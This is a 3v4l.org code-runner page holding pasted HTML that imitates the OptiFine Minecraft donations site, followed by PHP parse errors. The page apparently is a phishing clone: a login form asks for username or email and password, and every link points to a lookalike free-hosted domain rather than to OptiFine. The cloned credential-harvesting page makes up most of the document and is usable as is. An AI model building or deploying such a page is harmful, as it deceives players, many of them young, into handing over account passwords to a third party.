3v4l.org

run code in 300+ PHP versions simultaneously
<?php <!DOCTYPE html> <html> <head> <title>OptiFine Donations</title> <meta http-equiv="content-type" content="text/html; charset=UTF-8" /> <link rel="shortcut icon" href='images/grass.ico' /> <meta name="description" content="OptiFine - Minecraft performance tuning and advanced graphics" /> <meta name="keywords" content="optifine, minecraft, fps, lag, antialiasing, hd textures" /> <style type="text/css"> body {font-family:arial,helvetica,sans-serif; background-image:url('images/snow64x.gif');} A {color: rgb(100,128,255); text-decoration: none; } .tableRoot {margin: 0 auto; width: 800px; background: white; border: 1px solid rgb(128,128,128);} .title {font-family:Times, serif; font-size:300%; font-weight:bold; background: rgb(200, 200, 255); padding-left: 15px;} .title A {color: rgb(100,128,255); text-decoration: none;} .tableNav {text-align: left; background: rgb(240, 240, 255); border-width: 0px} .tableNav A {color: rgb(100,128,255); text-decoration: none;} .tableNav A:hover {color: rgb(100,128,255); text-decoration: underline; } .tableNav TR TD {padding-left: 15px; } .content {padding: 18px; padding-top: 10px; text-align: left; text-indent: 0px; margin: 10px; } .footer {font-size:small; text-align: right; background: rgb(240, 240, 255); padding: 5px; } .footer A {text-decoration: none; color: rgb(100,128,255); } .downloads {} .downloadTable {border-collapse:collapse;} .downloadLine {} .downloadLineFirst {background-color: #F0F0FF} .downloadLineFile {width: 14em; } .downloadLineFileFirst {width: 14em;} .downloadLineDownload {} .downloadLineDownloadFirst {font-weight: bold;} .downloadLineMirror {width: 5em; } .downloadLineDate {width: 10em; font-size: 80%;} .downloadLineChangelog {width: 6em;} LI STRONG {line-height: 200%;} .tableAds {margin: 0 auto; } .tableDonate TR {height: 35px; } .scaleNearest { image-rendering:optimizeSpeed; /* Legal fallback */ image-rendering:-moz-crisp-edges; /* Firefox */ image-rendering:-o-crisp-edges; /* Opera */ image-rendering:-webkit-optimize-contrast; /* Chrome (and eventually Safari) */ image-rendering:optimize-contrast; /* CSS3 Proposed */ -ms-interpolation-mode:nearest-neighbor; /* IE8+ */ } .tableData {border-collapse:collapse;} .tableData th {background-color:rgb(240, 240, 255)} .tableData, .tableData th, .tableData td {border: 1px solid black;} .tableData th, .tableData td {padding:5px;} .tableDataDis {background-color:rgb(220, 220, 220)} </style> </head> <body> <table class="tableRoot"> <tr> <td class="title"> <!-- Title --> <a href="http://optifinecape2016.netai.net">OptiFine</a> </td> </tr> <tr> <td class="tableNav"> <!-- Navigation --> <table class="tableNav"> <tr> <td> <a href="http://optifinecape2016.netai.net">Home</a> </td> <td> <a href="http://optifinecape2016.netai.net">Downloads</a> </td> <td> <a href="http://optifinecape2016.netai.net">Donate</a> </td> <td> <a href="http://optifinecape2016.netai.net">Cape</a> </td> <td> <a href="http://optifinecape2016.netai.net">Login</a> </td> <td> <a href="http://optifinecape2016.netai.net">FAQ</a> </td> </tr> </table> </td> </tr> <tr> <td class="content"> <!-- Content --> <noscript> <p style="color:red; font-size:x-large; display:inline"> JavaScript is disabled.<br> This page needs JavaScript in order to function properly. </p> </noscript> <h3>Login</h3> Here you can see your donation, activate your cape or move it to another username.<br> If you do not have a donator cape, you can get one by <a href="http://optifinecape2016.netai.net">donating</a>.<br> <br> <form name="login" action="login.php" method="POST"> <table> <tr><td>Username or Email</td><td><input type="text" name="email" size="30" autofocus="autofocus"></td></tr> <tr><td>Password</td><td><input type="password" name="password" size="30"></td><td><input type="submit" name="login" value=" Login "></td></tr> <tr><td></td><td><span style="font-size: small;"><a href="http://optifinecape2016.netai.net">Request password</a></span></td></tr> </table> </form> <br> <br> <br> <!-- End of content --> </td> </tr> <tr> <td class="footer"> <!-- Footer --> <a href="http://optifinecape2016.netai.net">Privacy</a> &nbsp; <a href="http://optifinecape2016.netai.net">Refund</a> &nbsp; <a href="http://optifinecape2016.netai.net">Contact</a> </td> </tr> </table> </body> </html>
Output for 7.0.0 - 7.0.1
Parse error: syntax error, unexpected '<', expecting end of file in /in/aAYqj on line 2
Process exited with code 255.
Output for 5.5.24 - 5.5.30, 5.6.8 - 5.6.16
Parse error: syntax error, unexpected '<' in /in/aAYqj on line 2
Process exited with code 255.

preferences:
169.19 ms | 1395 KiB | 25 Q